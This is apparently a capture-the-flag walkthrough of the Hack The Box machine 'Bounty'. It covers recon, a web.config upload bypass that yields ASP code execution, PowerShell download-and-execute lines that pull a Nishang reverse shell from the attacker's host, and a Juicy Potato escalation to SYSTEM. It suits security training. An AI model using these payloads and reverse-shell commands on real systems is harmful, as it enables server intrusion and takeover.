Bounty

Reconnaissance:

WAP:

• Web frameworks: Microsoft ASP.NET

• Web servers: IIS 7.5

• Operating systems: Windows Server

NMAP:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.93   

80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.93  

All 1000 scanned ports on 10.10.10.93 are in ignored states.

┌──(kali💀kali)-[~]
└─$ gobuster dir -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.93  

┌──(kali💀kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -t 30 -e -k -x .html,.asp,.php -u http://10.10.10.93:80

http://10.10.10.93:80/aspnet_client        (Status: 301) [Size: 159] [--> http://10.10.10.93:80/aspnet_client/]                                                                                 
http://10.10.10.93:80/uploadedfiles        (Status: 301) [Size: 159] [--> http://10.10.10.93:80/uploadedfiles/]     

┌──(kali💀kali)-[~]
└─$ nikto -host 10.10.10.93  

+ Server: Microsoft-IIS/7.5
+ /: Retrieved x-powered-by header: ASP.NET.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /OFZAtyF4.ashx: Retrieved x-aspnet-version header: 2.0.50727.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .                                                                   

We have one port open.

• Port 80: running Microsoft IIS httpd 7.5

The only port that is open is port 80 so this will definitely be our point of entry. The port is running an outdated version of Microsoft IIS. The scans didn’t report much information except for two directories aspnet_client and uploadedfiles that are available on the web server.

Enumeration:

Visit the web application in the browser.

http://10.10.10.93/

View the page source to see if it leaks any sensitive information.

view-source:http://10.10.10.93/

There doesn’t seem to be anything useful. The gobuster scan reported two directories aspnet_client and uploadedfiles. They both give us a 403 error.

http://10.10.10.93/aspnet_client/ http://10.10.10.93/uploadedfiles/

Since this is the only port open, there has to be something on this web server that gives us initial access. Let’s run another gobuster scan with a larger wordlist.

┌──(kali💀kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -e -k -u http://10.10.10.93:80 

dir: directory mode -w: wordlist -t: thread count -e: expanded mode, print full urls -k: skip ssl certificate verification -u: url

We don’t get any extra results. Let’s try adding file extensions. Since this is a Microsoft IIS server, we’ll add ASP and ASPX files.

┌──(kali💀kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -e -k -x .asp,.aspx,.txt -u http://10.10.10.93:80 

http://10.10.10.93:80/transfer.aspx        (Status: 200) [Size: 941]
http://10.10.10.93:80/*checkout*.aspx      (Status: 400) [Size: 11]

-x: file extensions to search for

Visit the transfer.aspx page.

http://10.10.10.93/transfer.aspx

.php = NO
.exe = NO
.txt = NO
.png = YES
.asp = NO
.aspx = NO
.config = YES

We get a “file uploaded successfully” message. We can view the image in the uploadedfiles directory that our original gobuster scan found.

http://10.10.10.93/uploadedfiles/matrix.png

This is good news! If we somehow can figure out a way to upload a file that contains ASPX code on the web server, we can execute the code by calling the file from the uploadedfiles directory.

It does however accept the .config extension, so we can upload a web.config file. This is a configuration file that is used to manage various settings of the web server. We shouldn’t be able to upload/replace this file in the first place, but to make matters even worse, if you google “web.config bypass upload restrictions”, you’ll find this link explaining how you could get remote code execution by simply adding ASPX code in the web.config file.

Let’s test it out. Copy the code from code from the link and save it in the web.config file. The code contains ASPX code that adds the integers 1 and 2 and outputs it on the screen. If we see the value 3 on the screen, we’ll know that we can run ASPX code using the web.config file.

Soroush Dalili | A web application security ninja 🥷soroush.me

GitHub - wireghoul/htshells: Self contained htaccess shells and attacksGitHub

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>

The above code executes the whoami command and outputs it on the screen. Upload the web.config file and view it.

http://10.10.10.93/uploadedfiles/web.config

bounty\merlin

Perfect! Now we’re pretty confident that we can get remote code execution through this upload functionality.

Foothold:

We definitely have code execution! Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.

GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.GitHub

Add the following line to the end of the script with the attack machine configuration settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 1234

When called, this sends a reverse shell back to our attack machine on port 1234. Setup a listener to receive the reverse shell.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234

Next, change the web.config file to download the PowerShell script and execute it.

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.3:5555/PowerShellTcp.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>

Start up a python server in the directory that the shell script resides in.

┌──(kali💀kali)-[~/Desktop]
└─$ python -m SimpleHTTPServer 5555

Upload the web.config file and view it.

We get a shell! Let’s try to grab the user.txt flag.

PS C:\windows\system32\inetsrv>whoami
bounty\merlin

PS C:\Users\merlin> cd Desktop
PS C:\Users\merlin\Desktop> dir

The Desktop directory seems to be empty. Let’s use the attrib command to see if the file is hidden.

PS C:\Users\merlin\Desktop> attrib
A  SH        C:\Users\merlin\Desktop\desktop.ini
A   HR       C:\Users\merlin\Desktop\user.txt

PS C:\Users\merlin\Desktop> type user.txt

Privilege Escalation:

Run the systeminfo command.

Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          12/18/2023, 4:39:29 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,566 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,550 MB
Virtual Memory: In Use:    545 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.93

It’s running Microsoft Server 2008 R2 and does not have any hot fixes installed, so it’s likely vulnerable to a bunch of kernel exploits. However, before we go down this route, let’s first check the system privileges that are enabled for this user.

PS C:\Users\merlin\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

SetImpersonatePrivilege is enabled so we’re very likely to get SYSTEM using Juciy Potato. Users running the SQL server service or the IIS service usually have these privileges enabled by design. This privilege is designed to allow a service to impersonate other users on the system. Juicy Potato exploits the way Microsoft handles tokens in order to escalate local privileges to SYSTEM.

GitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.GitHub

Releases · ohpe/juicy-potatoGitHub

Let’s test it out. Grab the Juicy Potato executable. transfer it to the target machine using the following command.

┌──(kali💀kali)-[~/Desktop]
└─$ python -m SimpleHTTPServer 5555 

PS C:\> (new-object net.webclient).downloadfile('http://10.10.14.3:5555/JuicyPotato.exe', 'C:\Users\merlin\Desktop\jp.exe')

Run the executable file to view the arguments it takes.

PS C:\Users\merlin\desktop> ./jp.exe
JuicyPotato v0.1 

Mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port

Optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

It requires 3 mandatory arguments. -t: Create process call. For this option we’ll use * to test both options. -p: The program to run. We’ll need to create a file that sends a reverse shell back to our attack machine. -l: COM server listen port. This can be anything. We’ll use 4444.

First copy the Invoke-PowerShellTcp.ps1 script once again into your current directory. Add the following line to the end of the script with the attack configuration settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 6666

When called, this sends a reverse shell back to our attack machine on port 6666.

Next, create a shell.bat file that downloads the above shell-2.ps1 PowerShell script and runs it.

nano shell.bat
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.3:5555/PowerShellTcp2.ps1')

Then download the .bat file on the target machine.

PS C:\Users\merlin\Desktop> (new-object net.webclient).downloadfile('http://10.10.14.3:5555/shell.bat', 'C:\Users\merlin\Desktop\shell.bat')

Setup a listener on the attack machine to receive the reverse shell.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 6666

Then run the Juicy Potato executable. This should attempt to get a token that impersonates SYSTEM and then run our shell.bat file with elevated privileges.

PS C:\Users\merlin\Desktop> ./jp.exe -t * -p shell.bat -l 6666
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 6666
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

┌──(kali💀kali)-[~]
└─$ nc -nlvp 6666
listening on [any] 6666 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49185
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system